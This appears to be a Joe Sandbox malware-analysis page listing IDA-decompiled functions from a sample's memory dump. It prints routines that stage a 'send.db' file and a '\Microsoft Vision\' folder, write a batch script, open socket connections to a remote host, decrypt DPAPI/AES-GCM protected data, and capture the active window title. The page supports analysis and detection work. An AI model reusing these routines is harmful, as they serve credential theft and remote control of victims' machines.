Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
String ID: 5$send.db
API String ID: 1005844419-2022884741
Opcode ID: 890bb3099c924a3b513a645e495856ffa230bddbd74c66a6af2a5ff12cd2f170
Instruction ID: 439cecba011be9076ed91aad08d14cc292ad0ab12bef76a38f63f51328cc8db0
Opcode Fuzzy Hash: 890bb3099c924a3b513a645e495856ffa230bddbd74c66a6af2a5ff12cd2f170
Instruction Fuzzy Hash: 0C115271D4011DABDB10EB55DC85FEE77BCBFA4314F008079A585A6190EB789B46CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 01045307 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E01045307(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t35;
				void* _t37;

				_t35 = __edx;
				_t37 = __ecx;
				E01031052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t38 = _t37 + 4;
				E01033549(_t37 + 4, E010336F7( &_v8,  &_v2080));
				E01035FEB(_v8);
				_t8 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0103378B(E01033873( &_v32, _t35, _t38),  *_t8, _a4);
				E01033777( &_v32);
				return _a4;
			}

0x01045307
0x01045321
0x01045323
0x01045333
0x01045345
0x01045351
0x01045360
0x01045368
0x01045370
0x01045370
0x01045377
0x0104537a
0x01045382
0x0104538d
0x01045395
0x010453a0

APIs

GetTempPathW.KERNEL32(00000400,?), ref: 01045333
lstrcatW.KERNEL32(?,send.db), ref: 01045345

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

5, xrefs: 0104537A
send.db, xrefs: 01045339

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: lstrlen$DispatcherExceptionFreePathTempUserVirtuallstrcatlstrcpy
String ID: 5$send.db
API String ID: 1005844419-2022884741
Opcode ID: 43d8b443fc7d3b90c35c92c1899f91ba3f43dbd9da715737c4814449e1f46f02
Instruction ID: 55f306d6687f651b0a99e43e63cdc9d14796d55a8b3e91412c7764e2715e8741
Opcode Fuzzy Hash: 43d8b443fc7d3b90c35c92c1899f91ba3f43dbd9da715737c4814449e1f46f02
Instruction Fuzzy Hash: 24016171D4011DABCB10EB65DC85FEEB7BCBFA4304F008065A585A6190EF749A46CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010457A1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E010457A1(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _v28;
				char _v32;
				short _v552;
				void* _t34;

				_t34 = __edx;
				_v8 = 0;
				E01031052( &_v552, 0, 0x208);
				__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v552);
				lstrcatW( &_v552, L"\\Microsoft Vision\\");
				E0103357C( &_v8, _t34, 0,  &_v552);
				_v32 = 0x3b;
				asm("xorps xmm0, xmm0");
				_v28 = 0;
				asm("movups [ebp-0x14], xmm0");
				E0103378B(E01033873( &_v32, _t34,  &_v8), 0, _a4);
				E01033777( &_v32);
				E01035FEB(_v8);
				return _a4;
			}

0x010457a1
0x010457ba
0x010457bd
0x010457d1
0x010457e3
0x010457f3
0x010457fe
0x01045805
0x01045808
0x0104580f
0x0104581a
0x01045822
0x0104582a
0x01045834

APIs

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 010457D1
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 010457E3

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

\Microsoft Vision\, xrefs: 010457D7
;, xrefs: 010457FE

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FolderFreePathVirtuallstrcat
String ID: ;$\Microsoft Vision\
API String ID: 1529938272-253167065
Opcode ID: 90149db044d726ab2d39c789cb904b4127af77a77d1497b79b253c4d9247b1f1
Instruction ID: 8d76d42d415553fba2e3f6994f028314709bb1d7a188371aebe0931abd3500be
Opcode Fuzzy Hash: 90149db044d726ab2d39c789cb904b4127af77a77d1497b79b253c4d9247b1f1
Instruction Fuzzy Hash: 2A012DB1C0011EABCB20EBA0DD89EEFBBBCFF68244F100155B545A6190EB74AB45CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010433B6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E010433B6(CHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				int _t4;
				void* _t13;
				void* _t16;

				_push(__ecx);
				_t13 = __edx;
				_v8 = 0;
				_t4 = CreateFileA(__ecx, 0x40000000, 0, 0, 2, 0, 0);
				_t16 = _t4;
				if(_t16 != 0xffffffff) {
					WriteFile(_t16, _t13, _a4,  &_v8, 0);
					_t4 = CloseHandle(_t16);
				}
				return _t4;
			}

0x010433b9
0x010433bf
0x010433cd
0x010433d0
0x010433d6
0x010433db
0x010433e7
0x010433ee
0x010433ee
0x010433f8

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,:start,?,?,01042887,00000000,?,?), ref: 010433D0
WriteFile.KERNEL32(00000000,?,76B30770,00000000,00000000,?,01042887,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?), ref: 010433E7
CloseHandle.KERNEL32(00000000,?,01042887,00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in (",\programs.bat,?,?,?), ref: 010433EE

Strings

:start, xrefs: 010433BA

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: :start
API String ID: 1065093856-1299720186
Opcode ID: caacf545a68967ea7c48dfb4c10571718da8ca40fc0c4a9448fe69f2bf2009a0
Instruction ID: ebfc3f24b66d7a086f1b87c1ada37ff9913f24216c7220623d367aeb3fc20bc2
Opcode Fuzzy Hash: caacf545a68967ea7c48dfb4c10571718da8ca40fc0c4a9448fe69f2bf2009a0
Instruction Fuzzy Hash: 37E022FA001118BFE3211B99ADC8DEB7A6CEB852B8F100124FA5192080D7304D0043B0

Uniqueness

Uniqueness Score: -1.00%

Function 01040A3C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01040A3C() {
				intOrPtr _v272;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t8;

				_v288 = 0x11c;
				_t5 = LoadLibraryA("ntdll.dll");
				if(_t5 == 0) {
					L3:
					if(_v272 != 2) {
						goto L5;
					} else {
						return _v284;
					}
				} else {
					_t8 = GetProcAddress(_t5, "RtlGetVersion");
					if(_t8 == 0) {
						L5:
						return 0;
					} else {
						 *_t8( &_v288);
						goto L3;
					}
				}
			}

0x01040a4a
0x01040a54
0x01040a5c
0x01040a77
0x01040a7e
0x00000000
0x01040a80
0x01040a87
0x01040a87
0x01040a5e
0x01040a64
0x01040a6c
0x01040a88
0x01040a8b
0x01040a6e
0x01040a75
0x00000000
0x01040a75
0x01040a6c

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 01040A54
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 01040A64

Strings

RtlGetVersion, xrefs: 01040A5E
ntdll.dll, xrefs: 01040A45

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 3ee928c512c501ce63cfa4598606a60fb8b9afdb978c68e30b5d4a0fec7ba8ed
Instruction ID: e79de427f8bf6d1b1296d0f92076a95f55dccb07d21fb0655ab2194416b3a748
Opcode Fuzzy Hash: 3ee928c512c501ce63cfa4598606a60fb8b9afdb978c68e30b5d4a0fec7ba8ed
Instruction Fuzzy Hash: B1E092B064020C47DB74AB359D8AADA37E45B06348F4081F4A681F1045DA74C5858F90

Uniqueness

Uniqueness Score: -1.00%

Function 010421DC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E010421DC(intOrPtr* __ecx) {
				signed int _v8;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t12 = __ecx;
				_t6 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				if(_t6 != 0) {
					 *_t6( *_t12,  &_v8);
				}
				return _v8;
			}

0x010421df
0x010421e0
0x010421ef
0x010421f8
0x01042200
0x01042208
0x01042208
0x0104220f

APIs

GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 010421F1
GetProcAddress.KERNEL32(00000000), ref: 010421F8

Strings

IsWow64Process, xrefs: 010421E5
kernel32, xrefs: 010421EA

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 5cc1f24cffcfe0141c04ef8cfbbe61512523365f8c4d58e8fea2ab73574b1080
Instruction ID: 4054b4656cc69cc2032f52b65b0b5eacdfdfd8d5ed58c946edc99b55b05693db
Opcode Fuzzy Hash: 5cc1f24cffcfe0141c04ef8cfbbe61512523365f8c4d58e8fea2ab73574b1080
Instruction Fuzzy Hash: D5E0CDF6500204FBDB20EB95DD8AF9F77ACDB08254F1004ACB581D2000D775DA00D750

Uniqueness

Uniqueness Score: -1.00%

Function 0103D01D Relevance: 6.3, APIs: 5, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0103D01D(signed int* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t23;
				void* _t33;
				struct _CRITICAL_SECTION* _t43;
				signed int* _t59;
				intOrPtr _t62;
				void* _t66;

				_t45 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				_t43 = __ecx + 0x3d8;
				EnterCriticalSection(_t43);
				_t67 = _t59[0x7b];
				_t62 = _a4;
				if(_t59[0x7b] != 0) {
					L2:
					_t69 = _t59[3];
					if(_t59[3] != 0) {
						L5:
						_t63 =  &(_t59[0xf1]);
						_t22 = E010321ED( &(_t59[0xf1]), 0);
						__eflags = _t22;
						if(_t22 == 0) {
							E01031F98(_t63);
						}
						_t23 = E010321ED( &(_t59[0xf3]), 0);
						__eflags = _t23;
						if(_t23 == 0) {
							E01031F98( &(_t59[0xf3]));
						}
						_v12 = _t59[4];
						_v8 = _t59[0x7c];
						E01031F6D(_t63, E0103CF43,  &_v12);
						E01031F6D( &(_t59[0xf3]), E0103CFB0,  &_v12);
						 *_t59 = 1;
						LeaveCriticalSection(_t43);
						E010321ED( &(_t59[0xf1]), 0xffffffff);
						E010321ED( &(_t59[0xf3]), 0xffffffff);
						EnterCriticalSection(_t43);
						 *_t59 =  *_t59 & 0x00000000;
						LeaveCriticalSection(_t43);
						E0103D1C8(_t59);
						_t33 = 0;
						__eflags = 0;
					} else {
						E01033507(_t66, _t62);
						if(E0103594B( &(_t59[1]), _t69, _t45,  *((intOrPtr*)(_t62 + 4))) != 0) {
							goto L5;
						} else {
							goto L4;
						}
					}
				} else {
					E01033507(_t66, _t62 + 8);
					if(E0103594B( &(_t59[0x79]), _t67,  &(_t59[0x79]),  *((intOrPtr*)(_t62 + 0xc))) == 0) {
						L4:
						LeaveCriticalSection(_t43);
						_t33 = 1;
					} else {
						goto L2;
					}
				}
				return _t33;
			}

0x0103d01d
0x0103d020
0x0103d021
0x0103d025
0x0103d027
0x0103d02e
0x0103d034
0x0103d03b
0x0103d03e
0x0103d05e
0x0103d05e
0x0103d062
0x0103d08b
0x0103d08b
0x0103d095
0x0103d09a
0x0103d09c
0x0103d0a0
0x0103d0a0
0x0103d0ad
0x0103d0b2
0x0103d0b4
0x0103d0bc
0x0103d0bc
0x0103d0c6
0x0103d0cf
0x0103d0db
0x0103d0ef
0x0103d0fb
0x0103d101
0x0103d10b
0x0103d118
0x0103d11e
0x0103d124
0x0103d128
0x0103d12c
0x0103d131
0x0103d131
0x0103d064
0x0103d06b
0x0103d07a
0x00000000
0x00000000
0x00000000
0x00000000
0x0103d07a
0x0103d040
0x0103d04a
0x0103d05c
0x0103d07c
0x0103d07d
0x0103d085
0x00000000
0x00000000
0x00000000
0x0103d05c
0x0103d137

APIs

EnterCriticalSection.KERNEL32(?), ref: 0103D02E
LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0103D07D

Part of subcall function 01033507: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,01032BD2,?,?,00000000,exit,00000000,start), ref: 0103352C

Part of subcall function 0103594B: getaddrinfo.WS2_32(76B30770,00000000,01034FB9,00000000), ref: 01035998
Part of subcall function 0103594B: socket.WS2_32(00000002,00000001,00000000), ref: 010359AF
Part of subcall function 0103594B: htons.WS2_32(00000000), ref: 010359D5
Part of subcall function 0103594B: freeaddrinfo.WS2_32(00000000), ref: 010359E5
Part of subcall function 0103594B: connect.WS2_32(?,?,00000010), ref: 010359F1

LeaveCriticalSection.KERNEL32(?), ref: 0103D101
EnterCriticalSection.KERNEL32(?), ref: 0103D11E
LeaveCriticalSection.KERNEL32(?), ref: 0103D128

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
String ID:
API String ID: 4195813003-0
Opcode ID: bb761c203f6ffd5a11994fd436824ce545f010c3866f68acc050dfb0dfe60f41
Instruction ID: a9d696950d45d042071099d35573a23ad045da1f930453801a7b56937ab98b2c
Opcode Fuzzy Hash: bb761c203f6ffd5a11994fd436824ce545f010c3866f68acc050dfb0dfe60f41
Instruction Fuzzy Hash: 683173B1210606BFD719EBA5CD50FEEF7ACBFA4350F400619E59692080DB74AA15CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01040BBE Relevance: 6.1, APIs: 4, Instructions: 54
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01040BBE(WCHAR** __ecx, intOrPtr* __edx) {
				struct HRSRC__* _t13;
				void* _t14;
				unsigned int _t32;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;

				_t35 = __edx;
				_t36 = LoadLibraryExW( *__ecx, 0, 2);
				if(_t36 == 0xffffffff) {
					L4:
					return 0;
				}
				_t13 = FindResourceW(_t36, 1, 0x10);
				if(_t13 == 0) {
					goto L4;
				}
				_t14 = LoadResource(_t36, _t13);
				if(_t14 == 0) {
					goto L4;
				}
				_t32 =  *(_t14 + 0x28);
				 *_t35 =  *((intOrPtr*)(_t14 + 0x14));
				 *((short*)(_t35 + 4)) =  *((intOrPtr*)(_t14 + 0x1a));
				 *((short*)(_t35 + 6)) =  *((intOrPtr*)(_t14 + 0x18));
				 *(_t35 + 8) = _t32 & 1;
				 *(_t35 + 0xc) = _t32 >> 0x00000001 & 1;
				 *(_t35 + 0x10) = _t32 >> 0x00000003 & 1;
				 *(_t35 + 0x14) = _t32 >> 0x00000005 & 1;
				FreeLibrary(_t36);
				return 1;
			}

0x01040bc7
0x01040bcf
0x01040bd4
0x01040c38
0x00000000
0x01040c38
0x01040bdd
0x01040be5
0x00000000
0x00000000
0x01040be9
0x01040bf1
0x00000000
0x00000000
0x01040bf6
0x01040bf9
0x01040bff
0x01040c0b
0x01040c0f
0x01040c24
0x01040c28
0x01040c2b
0x01040c2e
0x00000000

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0103DB4A), ref: 01040BC9
FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0103DB4A), ref: 01040BDD
LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0103DB4A), ref: 01040BE9
FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0103DB4A), ref: 01040C2E

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: LibraryLoadResource$FindFree
String ID:
API String ID: 3272429154-0
Opcode ID: 3fcfa645b4ac03225eece0d09ae55a6cfe5cc1344bb33ecf636f97683360b666
Instruction ID: 38daab7816c12f75f7ce02eba2ced1a662abfb5110aec8a214568859dfaf6b41
Opcode Fuzzy Hash: 3fcfa645b4ac03225eece0d09ae55a6cfe5cc1344bb33ecf636f97683360b666
Instruction Fuzzy Hash: B701C0F5311B05AFD3184F299CC4AA6BAA5FF49310704C238EA65C33A0D778D815C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0103C157 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0103C157(intOrPtr __ecx, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v16;
				void* _t16;
				void* _t19;
				void* _t34;
				void* _t35;

				_t35 = 0;
				_t16 = E0103C3B9(__ecx,  &_v12,  &_v8);
				_pop(_t26);
				if(_t16 == 0) {
					L8:
					return _t35;
				}
				_t34 = _v12;
				if(_v8 >= 5) {
					_t19 = E01031000(_t34, "DPAPI", 5);
					_t42 = _t19;
					if(_t19 == 0) {
						_push( &_v16);
						_push( &_v12);
						if(E0103C1DD(_t34 + 5, _v8 - 5, _t42) != 0) {
							if(_v16 == 0x20) {
								_t35 = E0103C419(_t22, _v12, _a8, _a12);
							}
							LocalFree(_v12);
						}
					}
				}
				LocalFree(_t34);
				goto L8;
			}

0x0103c166
0x0103c168
0x0103c16d
0x0103c170
0x0103c1d8
0x0103c1dc
0x0103c1dc
0x0103c176
0x0103c179
0x0103c183
0x0103c18b
0x0103c18d
0x0103c196
0x0103c19a
0x0103c1ae
0x0103c1b4
0x0103c1c5
0x0103c1c5
0x0103c1ca
0x0103c1ca
0x0103c1ae
0x0103c18d
0x0103c1d1
0x00000000

APIs

Part of subcall function 0103C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0103C3D8
Part of subcall function 0103C3B9: LocalAlloc.KERNEL32(00000040,?,?,0103C32B,?,00000000,?,00000000,?), ref: 0103C3E6
Part of subcall function 0103C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0103C3FC
Part of subcall function 0103C3B9: LocalFree.KERNEL32(?,?,0103C32B,?,00000000,?,00000000,?), ref: 0103C40A

LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0103C1D1

Part of subcall function 0103C1DD: GetLastError.KERNEL32 ref: 0103C243

LocalFree.KERNEL32(?), ref: 0103C1CA

Part of subcall function 0103C419: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0103C1C4,?), ref: 0103C436
Part of subcall function 0103C419: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0103C1C4,?), ref: 0103C44F
Part of subcall function 0103C419: BCryptGenerateSymmetricKey.BCRYPT(00000020,0103C1C4,00000000,00000000,?,00000020,00000000,?,0103C1C4,?), ref: 0103C464

Strings

DPAPI, xrefs: 0103C17D
, xrefs: 0103C1B0

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
String ID: $DPAPI
API String ID: 379455710-1819349886
Opcode ID: 4b5797579c5455ff7072904db8c2aecdc6d412ef05f712ebf1c3cbf5110021d8
Instruction ID: 500b9f7dd8e46f284ffb2b259036d43eb57f08dd4569976a2c23fe53509b7bb9
Opcode Fuzzy Hash: 4b5797579c5455ff7072904db8c2aecdc6d412ef05f712ebf1c3cbf5110021d8
Instruction Fuzzy Hash: 7C01C47690010ABBEF10EBA4DE48DEEBB7CAB85214F0081A6ED41F2144E770AA45DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 010348B7 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E010348B7(intOrPtr _a4) {
				char _v8;
				struct tagLASTINPUTINFO _v16;
				signed int _v36;
				char _v40;
				short _v552;

				_v16.cbSize = 8;
				GetLastInputInfo( &_v16);
				_t23 = GetTickCount() - _v16.dwTime;
				GetWindowTextW(GetForegroundWindow(),  &_v552, 0x100);
				E010336F7( &_v8,  &_v552);
				_t12 =  &_v36;
				_v36 = _v36 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v40 = 0x15;
				asm("movups [ebp-0x1c], xmm0");
				E0103378B(E01033873(E01033852( &_v40, (GetTickCount() - _v16.dwTime) / 0x3e8), _t23 % 0x3e8,  &_v8),  *_t12, _a4);
				E01033777( &_v40);
				E01035FEB(_v8);
				return _a4;
			}

0x010348c4
0x010348cc
0x010348d8
0x010348f9
0x01034909
0x01034911
0x01034911
0x01034919
0x0103491c
0x01034927
0x01034939
0x01034941
0x01034949
0x01034953

APIs

GetLastInputInfo.USER32 ref: 010348CC
GetTickCount.KERNEL32 ref: 010348D2
GetForegroundWindow.USER32 ref: 010348E6
GetWindowTextW.USER32 ref: 010348F9

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

